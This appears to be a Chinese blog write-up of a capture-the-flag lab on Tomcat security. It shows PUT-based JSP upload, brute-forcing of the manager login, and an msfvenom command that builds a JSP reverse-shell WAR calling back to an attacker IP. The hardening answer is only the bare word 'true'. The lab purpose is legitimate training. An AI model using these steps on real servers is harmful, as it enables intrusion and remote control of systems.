tomcat中间件安全与加固


任务三:tomcat中间件安全与加固

任务环境说明:
ü 服务器场景名称:w-win7
ü 服务器场景用户名:administrator;密码:未知(开放链接)
ü 渗透机场景:kali
ü 渗透机用户名:root,密码:toor
1. 通过渗透机场景kali中的工具对web服务器进行扫描,浏览web服务器网页,在首页中找到tomcat服务版本号,并将其版本号作为flag提交;

Apache Tomcat/7.0.81

2. 已知此版本的tomcat具有上传漏洞,即向页面提交发送请求就会生成对应的文件。利用Burp Suite工具进行抓包,向网站首页位置提交内容为<%out.print(“hello”);%>文件名字为good.jsp的请求。将Burp Suite中的PUT请求作为flag提交(注:flag长度为16个单位长度);

tomcat中间件安全与加固

PUT /good.jsp/
PUT%20/good.jsp/

3. 通过msfconsole工具使用root目录下的的password.txt文件进行tomcat后台账户密码的破解,并将账户密码作为flag提交。(flag格式:账户_密码);

root:root

4. 用kali中的分离工具查看root目录下bm1.war文件中的flag文件,并将flag文件内容作为提交;

bm1.war文件能压缩
binwalk -e bm1.war

tomcat中间件安全与加固

5. 通过第3题中的账户密码登陆网页(格式为服务器IP:8080/manager/html),将kali中root目录下的bm1.war文件上传后连接(连接地址为IP:8080/bm1/index.jsp)。在服务器中查找flag.txt文件,并将其内容作为flag提交;

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.147.129 LPORT=5555 -f war -o bm1.war
生成一个马 然后再本地开5555端口 然后部署上传
tomcat中间件安全与加固

点击就能执行 把shell反弹回来
tomcat中间件安全与加固

windows: cd c:
dir “flag.txt” /s /b

linux: find / -name “flag.txt”

6. 修改tomcat配置文件内容,使tomcat可以抵御第2题中的漏洞,将修改内容作为flag提交;

true

原创文章,作者:,如若转载,请注明出处:https://blog.ytso.com/tech/pnotes/268388.html

(0)
上一篇 2022年6月20日 05:02
下一篇 2022年6月20日 05:02

相关推荐

发表回复

登录后才能评论